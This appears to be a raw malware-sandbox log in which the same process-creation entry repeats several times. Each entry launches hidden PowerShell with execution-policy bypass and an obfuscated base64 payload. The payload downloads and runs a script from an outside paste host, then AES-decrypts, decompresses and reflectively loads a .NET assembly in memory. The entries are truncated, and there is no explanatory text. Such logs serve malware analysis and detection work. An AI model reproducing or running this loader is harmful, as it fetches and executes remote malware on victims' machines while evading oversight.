jZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
